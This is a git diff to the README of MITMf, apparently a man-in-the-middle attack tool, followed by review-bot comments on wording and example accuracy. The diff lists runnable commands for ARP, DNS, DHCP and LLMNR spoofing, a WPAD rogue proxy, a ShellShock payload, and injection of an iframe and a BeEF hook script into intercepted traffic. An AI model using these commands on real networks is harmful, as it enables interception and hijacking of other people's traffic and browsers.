diff --git a/README.md b/README.md index a9b8a7c..6ff6741 100644 --- a/README.md +++ b/README.md @@ -16,7 +16,7 @@ Contact me at: - IRC on Freenode: #MITMf - Email: byt3bl33d3r@gmail.com -**Before submitting issues, please read the [FAQ](#faq) and [CONTRIBUTING.md](CONTRIBUTING.md).** +**Before submitting issues, please read the [CONTRIBUTING.md](CONTRIBUTING.md).** Description ============ 
@@ -40,46 +40,67 @@ allowing users to modify any type of traffic or protocol. - [Responder](https://github.com/SpiderLabs/Responder) integration allows for LLMNR, NBT-NS and MDNS poisoning and WPAD rogue server support. +Active packet filtering/modification +==================================== + +You can now modify any packet/protocol that gets intercepted by MITMf using Scapy! (no more etterfilters! yay!) + +For example, here's a stupid little filter that just changes the destination IP address of ICMP packets: + +``` +if packet.haslayer(ICMP): + packet.dst = '192.168.1.0' + +``` +- Use the ```packet``` variable to access the packet in a Scapy compatible format +- Use the ```data``` variable to access the raw packet data + +Now to use the filter all we need to do is: ```python mitmf.py -F ~/filter.py``` + +You will probably want to combine that with the **Spoof** plugin to actually intercept packets from someone else ;) + Examples ======== The most basic usage, starts the HTTP proxy SMB,DNS,HTTP servers and Net-Creds on interface enp3s0: -- ```python mitmf.py -i enp3s0``` +```python mitmf.py -i enp3s0``` ARP poison 192.168.1.0/24 with the gateway at 192.168.1.1 using the **Spoof** plugin: -- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` +```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` Same as above + a WPAD rogue proxy server using the **Responder** plugin: -- ```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad``` +```python mitmf.py -i enp3s0 --spoof --arp --target 192.168.0.0/24 --gateway 192.168.1.1 --responder --wpad``` Enable DNS spoofing while ARP poisoning (Domains to spoof are pulled from the config file): -- ```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` +```python mitmf.py -i enp3s0 --spoof --dns --arp --target 192.168.1.0/24 --gateway 192.168.1.1``` Enable 
LLMNR/NBTNS/MDNS spoofing: -- ```python mitmf.py -i enp3s0 --responder --wredir --nbtns``` +```python mitmf.py -i enp3s0 --responder --wredir --nbtns``` Enable DHCP spoofing (the ip pool and subnet are pulled from the config file): -- ```python mitmf.py -i enp3s0 --spoof --dhcp``` +```python mitmf.py -i enp3s0 --spoof --dhcp``` Same as above with a ShellShock payload that will be executed if any client is vulnerable: -- ```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'``` +```python mitmf.py -i enp3s0 --spoof --dhcp --shellshock 'echo 0wn3d'``` Inject an HTML IFrame using the **Inject** plugin: -- ```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com``` +```python mitmf.py -i enp3s0 --inject --html-url http://some-evil-website.com``` Inject a JS script: -- ```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` +```python mitmf.py -i enp3s0 --inject --js-url http://beef:3000/hook.js``` -And much much more! Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) +And much much more! + +Of course you can mix and match almost any plugin together (e.g. ARP spoof + inject + Responder etc..) For a complete list of available options, just run ```python mitmf.py --help```
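Review bot: In the first hunk, the `[FAQ](#faq)` link is dropped from the "Before submitting issues" line, but nothing visible in this patch removes or relocates a FAQ section. If the section still exists in the README, keep the pointer to it; if its content moved into CONTRIBUTING.md, say so in the commit message so the removal is not read as accidental. The new wording "please read the [CONTRIBUTING.md]" also reads better without "the".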
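Review bot: In the new "Active packet filtering/modification" section of the second hunk, the example `packet.dst = '192.168.1.0'` does not say which layer `packet` refers to, so a reader cannot tell whether `dst` is the IP or the Ethernet destination; write `packet[IP].dst` or state the layer in the bullet that introduces `packet`. The two bullets should also document how `packet` and `data` relate (which one is forwarded if a filter changes both) and whether checksums are recalculated after a modification, since Scapy keeps a dissected packet's existing checksum value unless that field is deleted. `192.168.1.0` appears as the /24 network in the Examples section, so a host address would make a clearer destination in the sample filter. The fence around the filter has a stray blank line before the closing backticks. Further down, the WPAD example is described as "Same as above" but uses `--target 192.168.0.0/24` where the preceding command uses `192.168.1.0/24`; this patch rewrites that line and carries the mismatch over, so it is a good place to fix it.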